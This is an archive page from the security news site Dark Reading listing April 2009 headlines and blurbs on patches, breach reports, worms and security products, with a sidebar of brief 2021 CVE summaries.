Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

News & Commentary

Content posted in April 2009
<<   <   Page 2 / 3   >   >>
Secunia Pushes For Standard That Updates Consumer Apps
News  |  4/21/2009  | 
Danish security firm asks software vendors to help build common application that handles all third-party application updates and patching
Symantec Beefs Up Its SMB Security Line
Commentary  |  4/21/2009  | 
Symantec used this weeks RSA convention to roll out a pair of new security products aimed at small and midsize companies. The Symantec Protection Suite combines endpoint and messaging protection with data recovery to create a layered approach to security, while the Symantec Endpoint Protection Small Business Edition is designed to make SMB security easy to install and manage.
RSA Offers Encryption Toolkit Free To Developers
News  |  4/20/2009  | 
New Share Project program will help build security into software from the ground up
Cisco Launches Security Services For Cloud Computing, Collaboration
News  |  4/20/2009  | 
New services will also help enterprises manage cloud security
The Human Element Behind Malware-Related Breaches
Commentary  |  4/20/2009  | 
Last year, the Verizon Data Breach Investigation Report made a big splash with insightful statistics on actual data breach investigations performed by the company's incident response team. Last week, the team released an updated version (PDF) for 2009 that includes more data, as well as an interesting look at what happened during the past year. What's grabbing my attention? The numbers related to malwa
Oracle's Acquisition of Sun Changes Identity Management Landscape
Commentary  |  4/20/2009  | 
Oracle's stealing Sun at the altar of a possible marriage with IBM not only saves Oracle from a long-standing partnership going stale, but also significantly bolsters Oracle's security capabilities.
I'm Interested, But In You
Commentary  |  4/20/2009  | 
Social engineering is a disturbing aspect of overall security threat analysis because it is the human element that is least in our control. Security and psychology -- once again -- go hand in hand.
Apps Bypassing Business Security -- Bigtime!
Commentary  |  4/20/2009  | 
Those applications your employees use (whether you want them to or not) are making it easier for them to bypass security systems and controls. A new report from firewall company Palo Alto Networks shows just how easy -- and just how serious the problem is.
Companies Still Falling Short On Security Training, Study Says
Quick Hits  |  4/20/2009  | 
Nearly half of security professionals say their company cultures are "unsupportive" of security
Botnets: Coming To A Social Network Near You
Commentary  |  4/17/2009  | 
I've dealt with a lot of different types of bots. The communication channels among them have varied from unsophisticated IRC command and control (C&C) servers to advanced peer-to-peer (P2P) protocols. For botnet herders, the challenge is flying under the radar of network security professionals who are monitoring their networks and looking for anomalies. The infosec pros who know their networks inside and out are likely to pick up on strange protocols pretty quickly -- which is one of the reasons
SSD And The Infrastructure
Commentary  |  4/17/2009  | 
In a recent blog on InformationWeek's sister site Internet Evolution, David Vellante's "Flash Drives Set to Give Internet a Performance Boost" suggests that fibre drives might be replaced by flash drives within the next three years. In our presentation last year on "The State of SSD" we made a similar prediction. Since David and I agr
Jericho Forum Issues Best Practices For Secure Cloud Computing
News  |  4/17/2009  | 
"Cloud Cube" model provides criteria for evaluating online services model, provisioning
Unauthorized Apps Often Go Unseen And Unchecked, Study Says
Quick Hits  |  4/17/2009  | 
Despite policies, most corporate networks remain rife with P2P, Google tools, and other unsanctioned apps, study says
Netgear Unified Threat Management Appliances Aimed At Small Business Gateways
Commentary  |  4/17/2009  | 
Netgear's just announced ProSecure Unified Threat Management (UTM) appliances aim to identify threats in the cloud, block them at the gateway, and to do so at prices aggressively aimed at small business budgets, even in tight economic times.
RSA: Microsoft Pushes 'Geneva' In War On Passwords
News  |  4/16/2009  | 
Formerly known as Zermatt, the claims-based access platform is a framework for granting people access to information.
Insecurity The Price Of Ubiquity
Commentary  |  4/16/2009  | 
The mainstream media seems enamored by the ubiquitous Internet, but it's not doing much to reveal the risks of interconnected computers.
OTA Fails Several Government Agencies, Retailers For Poor Online Security
Quick Hits  |  4/16/2009  | 
The Online Trust Alliance calls out the DHS, FBI, White House, and others for not using email authentication on their Websites
Microsoft Partners With Network Security Vendors For 'Stirling'
News  |  4/16/2009  | 
Microsoft releases new beta version of next-gen security suite, announces first Forefront security service
Samsung Offers Self-Encrypting SSDs
News  |  4/16/2009  | 
Dell says it plans to offer the drives in laptops in the coming months.
Spam Is Killing The Planet
News  |  4/16/2009  | 
McAfee says that the energy required to send, route, and filter spam e-mail each year could power 2.4 million homes and release as much greenhouse gas as 3.1 million cars.
Data Breaches WAY Up In 2008; 90% Of Them Easily Preventable
Commentary  |  4/16/2009  | 
According to a new Verizon study, 2008 saw more instances of data breaches than the preceding four years combined. And considering how easily most of those breaches could be prevented -- but weren't -- my guess is that 2008 won't hold the record for long.
Report: 2008 Saw More Records Breached Than The Previous Four Years Combined
Quick Hits  |  4/15/2009  | 
Most compromises could have been avoided, Verizon study says
Open Source Metrics On Tap For Security Patch Management
News  |  4/15/2009  | 
Securosis, Microsoft team up to solicit input for building a metrics model that measures efficiency and costs of security patching
The Certainty Of Death, Taxes and Malware
Commentary  |  4/15/2009  | 
In a letter to Jean-Baptiste Leroy, Benjamin Franklin spoke of the seemingly permanent outlook for the new Constitution, and followed up with "but in this world nothing can be said to be certain, except death and taxes." I don't think we can disagree about any of those points, especially with today being when the tax man cometh. However, I think we can add something else to that quote about certainty: malware.
With More Urgency Than Usual, Apply This Month's Batch of Microsoft Patches
Commentary  |  4/14/2009  | 
Exploits are already out in the wild for a number of the vulnerabilities patched just today.
More Data Breached In 2008 Than In Previous Four Years Combined
News  |  4/14/2009  | 
Surprisingly, 99% of breached records were accessed through servers and applications, rather than desktop computers, notebooks, mobile phones, or portable media.
Study: Despite Increased Security Spending, Severity Of Breaches Is On The Increase
News  |  4/14/2009  | 
CompTIA study says human error is the most frequent cause of breaches worldwide
Chinese National Arrested For Source Code Theft
News  |  4/14/2009  | 
The information was taken from a New Jersey company that develops, implements, and supports software for environmental applications.
Attack Sneaks Rootkits Into Linux Kernel
News  |  4/14/2009  | 
A researcher at Black Hat Europe this week will demonstrate a more stealthy way to hack Linux
Microsoft Issues Eight Security Bulletins For April Patch Day
News  |  4/14/2009  | 
The fixes repair an Excel flaw that Microsoft warned about in February, as well as an Internet Information Services and SQL Server vulnerability.
Over 60% Of Breaches Tied To Flaws In Business-Critical Applications
Quick Hits  |  4/14/2009  | 
Survey by Forrester Consulting and Veracode shows businesses struggling to stay on top of application security
Got Any Good Disaster Stories? Got Any Good (Or Better!) Recovery Stories?
Commentary  |  4/14/2009  | 
Disaster strikes! And businesses that are prepared spring into Recovery Mode, missing as few business beats as possible. How prepared is your business for disaster? (More importantly, how prepared are you for recovery?) And have you ever had to test your planning for real? bMighty wants to know.
EU Says UK Privacy Laws Lacking
News  |  4/14/2009  | 
European watchdogs say Britain needs to impose stricter controls on targeted Internet advertising.
Primary Storage Optimization Compromises
Commentary  |  4/13/2009  | 
Primary file system storage optimization, i.e. squeezing more data into the same space, continues to grow in popularity. The challenge is that the deduplication of primary storage is not without its rules. You can't dedupe this, you can dedupe that and you have to be cognizant of the performance impact on a deduplicated volume.
Get Ready To Patch
Commentary  |  4/13/2009  | 
Organizations need to prep for a pretty significant set of patches that are scheduled to be rolling out from Redmond tomorrow. It's the most security patch updates from Microsoft in nearly six months.
RSA Integrates Data Leak Prevention With Security Information Management
Quick Hits  |  4/13/2009  | 
DLP 7.0 will interact with enVision SIEM tool, allowing IT to identify insider events
New Web Vulnerability Tool Is Passive But Aggressive
Commentary  |  4/13/2009  | 
Every couple of weeks, a project comes across my desk that requires some sort of Web application vulnerability assessment or penetration test. It's one of the more fun things I get to do, and I rely on a quite a few different tools during each engagement. While most people relatively unfamiliar with Web app security think of active scanning apps such as Cenzic and WebInspect when they think Web app testing, quite a few of the tools I use fall into the passive analysis category.
Conficker Worm Hits University Of Utah
News  |  4/13/2009  | 
Conficker tries to copy itself to removable media drives in a way that forces code execution whenever the removable drive is inserted into a computer system.
IE 7 and 8 Default Security Leaves Intranets At Risk
News  |  4/13/2009  | 
Researcher details attacks on intranets that abuse Internet Explorer 7 and 8 security default settings
Twitter Worm Strikes; Teen Worm Creator Feels Pretty Bad About It
Commentary  |  4/13/2009  | 
This weekend's Twitter worm(s) problem is turning into this week's Twitter worm(s) problem, and is a reminder that as social networks come of age so do social net risks. Good thing the kid who created the worms feels bad about it.
Twitter Visited By Worms Instead Of Bunnies
News  |  4/13/2009  | 
An exploit of a cross-site scripting flaw in Twitter sent almost 10,000 spam tweets and compromised at least 190 accounts over the weekend.
Worm Hits Twitter Over Easter Weekend
Commentary  |  4/13/2009  | 
A multi-day attack infected numerous user accounts on the popular micro-blogging platform. Reports say malicious code is still active.
Black Hat Europe: Interesting InfoSec Research Ahead (Be Afraid)
Commentary  |  4/11/2009  | 
I always enjoy the Black Hat sessions. The conference leans much more on the technical side of things, more so than the humungous brochure-fest known as RSA. Black Hat Europe is next week April 14th through 17th. And while I won't be able to (unfortunately) attend, there's a number of sessions I wouldn't miss if I was able to hope a flight to Amsterdam.
Researcher To Demonstrate Flaws In Wireless Warehouse Networks
Quick Hits  |  4/10/2009  | 
Trustwave pen tester says 802.11 FHSS networks aren't as safe as many companies think
Webcam Captures Burglars
Commentary  |  4/10/2009  | 
The Internet gets plenty of blame for facilitating crimes, but it deserves at least as much credit for solving them. Consider the case of 43-year-old Jeanne Thomas of Boynton Beach, Florida, who was at work in Fort Lauderdale on Wednesday, watching her home through a live video feed from a desktop Webcam, when she saw two intruders enter her house.
Tech Insight: Making The Most Of Open-Source Forensics Tools
News  |  4/10/2009  | 
Emerging offerings can turn network forensics into a low-cost, do-it-yourself security project
Optimize Cloud Storage, Flash Storage And Deduplication
Commentary  |  4/10/2009  | 
In our last entry we discussed the growing importance of efficiency. Tools and better storage systems can help make IT Administrators more efficient. The other option is to keep throwing new technology at the problem. Cloud Storage, Flash Storage and Deduplication are great examples.
Microsoft Plans Eight Security Fixes Next Week
News  |  4/9/2009  | 
Five of the Patch Tuesday fixes affect Windows, one affects Internet Explorer, one affects Excel, and one affects ISA Server.
Many Enterprises Still Don't Recognize Insider Threat, Studies Say
News  |  4/9/2009  | 
Small businesses are chief laggards in deploying data leakage protection technology, researchers say
Fujitsu Consulting Reveals Breach Involving Travelers, Other IT Clients
Quick Hits  |  4/9/2009  | 
Personal information of more than 3,000 may have been lost along with storage device containing data on Fujitsu IT client projects
<<   <   Page 2 / 3   >   >>


News
Inside the Ransomware Campaigns Targeting Exchange Servers
Kelly Sheridan, Staff Editor, Dark Reading,  4/2/2021
Commentary
Beyond MITRE ATT&CK: The Case for a New Cyber Kill Chain
Rik Turner, Principal Analyst, Infrastructure Solutions, Omdia,  3/30/2021
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2021-30485
PUBLISHED: 2021-04-11
An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_internal_dtd(), while parsing a crafted XML file, performs incorrect memory handling, leading to a NULL pointer dereference while running strcmp() on a NULL pointer.
CVE-2021-30481
PUBLISHED: 2021-04-10
Valve Steam through 2021-04-10, when a Source engine game is installed, allows remote authenticated users to execute arbitrary code because of a buffer overflow that occurs for a Steam invite after one click.
CVE-2021-20020
PUBLISHED: 2021-04-10
A command execution vulnerability in SonicWall GMS 9.3 allows a remote unauthenticated attacker to locally escalate privilege to root.
CVE-2021-30480
PUBLISHED: 2021-04-09
Zoom Chat through 2021-04-09 on Windows and macOS allows certain remote authenticated attackers to execute arbitrary code without user interaction. An attacker must be within the same organization, or an external party who has been accepted as a contact. NOTE: this is specific to the Zoom Chat softw...
CVE-2021-21194
PUBLISHED: 2021-04-09
Use after free in screen sharing in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.